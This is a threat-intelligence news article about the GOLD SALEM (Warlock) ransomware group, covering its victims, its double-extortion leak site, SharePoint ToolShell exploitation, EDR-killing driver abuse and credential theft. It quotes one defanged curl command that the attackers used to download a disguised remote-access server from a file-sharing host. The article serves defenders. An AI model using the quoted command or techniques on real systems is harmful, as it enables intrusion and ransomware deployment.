The cyberthreat landscape has witnessed the emergence of another sophisticated ransomware operation as GOLD SALEM, a new threat actor group also known as Warlock Group, has been actively compromising enterprise networks since March 2025.
This emerging ransomware collective has successfully targeted 60 organizations across North America, Europe, and South America, demonstrating competent tradecraft while deploying their custom Warlock ransomware payload.
Microsoft has tracked this group as Storm-2603 and suggests with moderate confidence that it operates from China, though attribution remains inconclusive.
GOLD SALEM has positioned itself strategically within the competitive ransomware ecosystem by targeting a diverse range of victims, from small commercial entities to large multinational corporations.
The group operates through a sophisticated double-extortion model, utilizing a Tor-based data leak site to publish stolen victim data when ransom demands go unpaid.
Their victim selection appears strategic, largely avoiding targets in China and Russia, though they notably listed a Russian electricity generation services company in September 2025, suggesting potential operations from outside traditional ransomware safe havens.
The threat actors made their public debut through underground forums in June 2025, posting on the RAMP forum to solicit exploits for enterprise applications including Veeam, ESXi, and SharePoint, while seeking tools to disable endpoint detection and response systems.
Sophos analysts identified the group’s sophisticated operational security measures and noted their recruitment efforts for initial access brokers, indicating either direct intrusion capabilities or the development of a ransomware-as-a-service model.
GOLD SALEM’s operational infrastructure demonstrates advanced planning and technical sophistication.
The group maintains countdown timers for each victim, typically allowing 12-14 days for ransom payment before data publication.
As of September 2025, they claim to have sold data from 45% of their victims to private buyers, though these figures may be inflated for psychological impact.
.webp "GOLD SALEM Compromise Networks and Bypass Security Solutions to Deploy Warlock Ransomware 3")
The group’s data leak site features professional presentation and victim categorization, reflecting their commitment to operational professionalism.
Advanced Evasion Techniques and Security Bypass Methods
The technical analysis reveals GOLD SALEM’s sophisticated approach to security solution bypass and persistent network access.
The group employs the ToolShell exploit chain targeting SharePoint servers for initial network compromise, leveraging a combination of critical vulnerabilities including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771.
Upon successful exploitation, they deploy an ASPX web shell that creates Process objects for cmd[.]exe within the IIS worker process context, enabling remote command execution with output visibility.
A particularly notable technique observed involves their command execution through the web shell:
curl - L - o c:\users\public\Sophos\Sophos-UI[.]exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks[.]exe[.]txtThis command downloads a Golang-based WebSockets server, establishing persistent access independent of the initial web shell.
The group demonstrates advanced evasion capabilities through Bring Your Own Vulnerable Driver (BYOVD) techniques, utilizing a renamed vulnerable Baidu Antivirus driver (googleApiUtil64.sys) to exploit CVE-2024-51324 for arbitrary process termination, specifically targeting EDR agents.
Their toolkit includes Mimikatz for credential extraction from LSASS memory, PsExec and Impacket for lateral movement, and Group Policy Object abuse for ransomware deployment across network endpoints.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Source link
